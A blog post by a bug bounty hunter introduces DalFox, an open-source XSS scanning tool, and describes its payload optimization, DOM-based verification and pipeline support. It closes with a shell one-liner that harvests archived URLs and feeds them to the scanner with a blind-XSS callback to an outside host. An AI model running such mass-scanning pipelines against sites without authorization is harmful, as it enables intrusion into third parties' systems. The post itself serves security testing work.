DalFox: My New Weapon for XSS
Hi, hackers and bugbounty hunters ๐๐ผ
Today Iโm going to talk about my new XSS tool, DalFox. Iโm sure there are a lot of bugs because itโs still under development, but Iโm going to talk about it lightly now because itโs somewhat functional and has a critical bug fixed!
https://github.com/hahwul/dalfox
What is DalFox
It is a tool that analyzes parameters and scans XSS just like the existing XSpear. Most of the key features of existing specs are inherited, and the new version addresses chronic slow speed and detection issues. Andโฆ there was a big change from Ruby to Go.
This is Key features:
- Payload Optimization according to parameter analysis
- Analyze the location of code insertion through abstraction and use Payload for the type
- DOM-based verification logic
- Pipeline support
(What you see in git is the most accurate.)
Optimization & Abstraction
Existing XSpear used multiple testing queries, DalFox has a Badchar-based payload verification logic. This selects the query to use for the actual test based on the data obtained from the parameter testing. And we talked about the abstraction concept above, which eventually divides the code into HTML and Script areas, as shown below, identifies the injected location, and uses the payload according to the location.
DalFox checked HTML, Javascript, Attribute
DOM Verify
For XSpear, the Selenium driver has verified that the alert actually occurs. This is a sure way to find it, but calling the headless browser is a very slow task. The system is overloaded, especially if you want to verify a huge number of data.
So at DalFox, we boldly threw away Selenium, and we changed it to a DOM-based verification method. If you think the actual object is inserted, you can think of it as Verify. Verified parameters do not need to be tested further, so the remaining payload queues will be passed (not testing).
Pipeline
On DalFox, I paid a little more attention to the part where I got the factor value (io, file, arg) or log output so that I could fit into the pipeline in general. Basically, scan logging provides a variety of data, such as code views and actual payloads, but print only attack query it out if you with a pipeline option.
So, just a simple pipeline tip :D
cat target_list | waybackurls -no-subs | grep "https://" | \
grep -v "png\|jpg\|css\|js\|gif\|txt" | grep "=" | qsreplace | \
qsreplace -a | dalfox -pipe -blind https://hahwul.xss.ht
Finally
Since last year, I have been changing my main language from Ruby to Go, and finally, I have changed my biggest (open to the public) project. There may still be many bugs, but if you use it and have good suggestions or bugs, please register them as git issues. And finally, about the name, Dal of DalFox is the Korean pronunciation of moon.
// and Fox = Finder of XSS, Haha happy hacking!
